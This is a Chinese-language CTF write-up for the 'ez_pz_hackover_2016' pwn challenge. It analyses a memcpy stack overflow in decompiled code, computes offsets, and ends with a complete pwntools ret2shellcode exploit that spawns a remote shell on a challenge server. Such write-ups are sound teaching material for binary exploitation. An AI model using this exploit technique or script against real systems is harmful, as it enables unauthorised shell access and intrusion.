HugeH4rD

ez_pz_hackover_2016

Ubuntu16

0x01

checksec

[*] '/home/zelas/Desktop/pwn/ez_pz_hackover_2016/ez_pz_hackover_2016'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

//没有开保护

IDA

chall()函数

int chall()
{
  size_t v0; // eax
  int result; // eax
  char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
  _BYTE *v3; // [esp+40Ch] [ebp-Ch]

  printf("Yippie, lets crash: %p\n", s);		//输出S的地址
  printf("Whats your name?\n");
  printf("> ");
  fgets(s, 1023, stdin);
  v0 = strlen(s);
  v3 = memchr(s, 10, v0);
  if ( v3 )
    *v3 = 0;
  printf("\nWelcome %s!\n", s);
  result = strcmp(s, "crashme");
  if ( !result )
    result = vuln((char)s, 0x400u);			//这里可以传入0x400的长度
  return result;
}

vuln() //一个字符串复制函数

void *__cdecl vuln(char src, size_t n)
{
  char dest[50]; // [esp+6h] [ebp-32h] BYREF

  return memcpy(dest, &src, n);		//dest仅为0x32H  memcpy存在栈溢出漏洞
}

0x02

思路 ret2shellcode

1.用crachme\x00 进入vuln()实现溢出

2.计算偏移

s - rbp 0x16

s - shellcode 0x1c

s	0x16
rbp	0x4
ret	[rbp-shellcode]

0x03

from pwn import *

context(arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 26257)
# io = process(['./ez_pz_hackover_2016'])
# elf = ELF('./ez_pz_hackover_2016')

io.recvuntil(b'crash: ')
stack_addr = int(io.recv(10), 16)
print('[+] stack_address -->', hex(stack_addr))
padding = 0x32 + 0x4
shellcode = asm(shellcraft.sh())
offset = 0x1c
payload = b"crashme\x00"+b"a"*18+p32(stack_addr-0x1c)+shellcode
delim = b'> '

io.sendlineafter(delim, payload)
io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

ez_pz_hackover_2016

0x01

0x02

0x03

Zelas2Xerath